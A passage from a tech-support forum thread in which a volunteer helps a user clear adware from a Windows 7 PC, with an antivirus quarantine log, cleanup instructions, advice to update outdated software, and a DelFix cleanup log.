Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{95B7759C-8C7F-4BF1-B163-73684A933233}     detected: Application.BHO (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APN     detected: Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\REGZOOKA     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\AOL TOOLBAR     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\APN     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VIEWPOINTMEDIAPLAYER     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{86D4B82A-ABED-442A-BE86-96357B70F4FE}     detected: Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\REGZOOKA     detected: Application.InstallAd (A)
C:\ProgramData\Ask     detected: Application.Win32.WebToolbar (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\VIEWPOINT     detected: Application.Win32.ViewBar (A)
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS     detected: Setting.DisableRegistryTools (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\CONDUIT     detected: Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}     detected: Application.Win32.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASAPI32     detected: Application.Win32.InstallExt (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASMANCS     detected: Application.Win32.InstallExt (A)

Scanned    243145
Found    50

Scan end:    9/16/2014 10:39:36 AM
Scan time:    2:51:56

Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASMANCS    Quarantined Application.Win32.InstallExt (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TRACING\TASKSCHEDULER_RASAPI32    Quarantined Application.Win32.InstallExt (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}    Quarantined Application.Win32.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\CONDUIT    Quarantined Application.InstallAd (A)
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS    Quarantined Setting.DisableRegistryTools (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\VIEWPOINT    Quarantined Application.Win32.ViewBar (A)
C:\ProgramData\Ask    Quarantined Application.Win32.WebToolbar (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\REGZOOKA    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{86D4B82A-ABED-442A-BE86-96357B70F4FE}    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VIEWPOINTMEDIAPLAYER    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\APN    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\AOL TOOLBAR    Quarantined Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\REGZOOKA    Quarantined Application.InstallAd (A)
Key: HKEY_USERS\S-1-5-21-941127145-1180520044-1929224469-1000\SOFTWARE\APN    Quarantined Application.InstallAd (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{95B7759C-8C7F-4BF1-B163-73684A933233}    Quarantined Application.BHO (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\VIPROTOCOL.VIPROTOCOLOLE    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\TYPELIB\{13ABD093-D46F-40DF-A608-47E162EC799D}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\SCRIPTHELPER.SCRIPTHELPERAPI    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INTERFACE\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\UPGRADECODES\F928123A039649549966D4C29D35B1C9    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\PRODUCTS\A28B4D68DEBAA244EB686953B7074FEF    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\INSTALLER\FEATURES\A28B4D68DEBAA244EB686953B7074FEF    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUPDCONTROLLER    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATER.DOWNLOADUIBROWSER    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\DNUPDATE    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{BC9FD17D-30F6-4464-9E53-596A90AFF023}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{95B7759C-8C7F-4BF1-B163-73684A933233}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{94496571-6AC5-4836-82D5-D46260C44B17}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\CLSID\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTLSECONDARY    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL.1    Quarantined Application.AdReg (A)
Key: HKEY_LOCAL_MACHINE\SOFTWARE\CLASSES\AXMETASTREAM.METASTREAMCTL    Quarantined Application.AdReg (A)
C:\Program Files\Common Files\software update utility    Quarantined Application.InstallUpd (A)
C:\Program Files\regzooka    Quarantined Application.AppInstall (A)
C:\Program Files\aol toolbar    Quarantined Application.AppInstall (A)
C:\Users\Dale\AppData\Local\aol toolbar    Quarantined Application.AppInstall (A)
C:\ProgramData\aol toolbar    Quarantined Application.AppInstall (A)

Quarantined    50
 



#11 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 16 September 2014 - 12:01 PM

Yes the stuff that Emsisoft has found is irrelevant.

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 11 ActiveX
Adobe Flash Player 11 Plugin
Adobe Reader X (10.1.4)
Java™ 6 Update 31
Mozilla Firefox 28.0 (x86 en-US)




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#12 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 16 September 2014 - 09:10 PM

Here is the log from Delfix:

 

# Username : Dale - DIMENSION-E510
# Operating System : Windows 7 Ultimate Service Pack 1 (32 bits)

~ Activating UAC ... OK

~ Removing disinfection tools ...

Deleted : C:\Qoobox
Deleted : C:\32788R22FWJFW
Deleted : C:\FRST
Deleted : C:\ComboFix.txt
Deleted : C:\Users\Dale\Desktop\Addition.txt
Deleted : C:\Users\Dale\Desktop\Fixlog.txt
Deleted : C:\Users\Dale\Desktop\FRST.exe
Deleted : C:\Users\Dale\Desktop\FRST.txt
Deleted : C:\Users\Dale\Desktop\RogueKiller.exe
Deleted : C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
Deleted : C:\Windows\grep.exe
Deleted : C:\Windows\PEV.exe
Deleted : C:\Windows\NIRCMD.exe
Deleted : C:\Windows\MBR.exe
Deleted : C:\Windows\SED.exe
Deleted : C:\Windows\SWREG.exe
Deleted : C:\Windows\SWSC.exe
Deleted : C:\Windows\SWXCACLS.exe
Deleted : C:\Windows\Zip.exe
Deleted : HKCU\console_combofixbackup
Deleted : HKLM\SOFTWARE\Swearware
Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\combofix.exe
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart
Deleted : HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #210 [Windows Update | 09/12/2014 23:34:50]
Deleted : RP #211 [Windows Update | 09/13/2014 04:46:58]
Deleted : RP #212 [Removed SupportSoft Assisted Service | 09/16/2014 22:54:25]
Deleted : RP #213 [Windows Update | 09/16/2014 23:00:16]

New restore point created !

~ Resetting system settings ... OK
 

I will be applying the updates to the other software shortly.  Hopefully this is behind us and gone for good.



#13 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 17 September 2014 - 07:52 PM

So everything is alright now and we can close this topic?

#14 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 17 September 2014 - 10:30 PM

Yes.  It seems as though everything is running good.  Thanks so much for your help.



#15 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 18 September 2014 - 05:56 AM

Thank you and take care.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users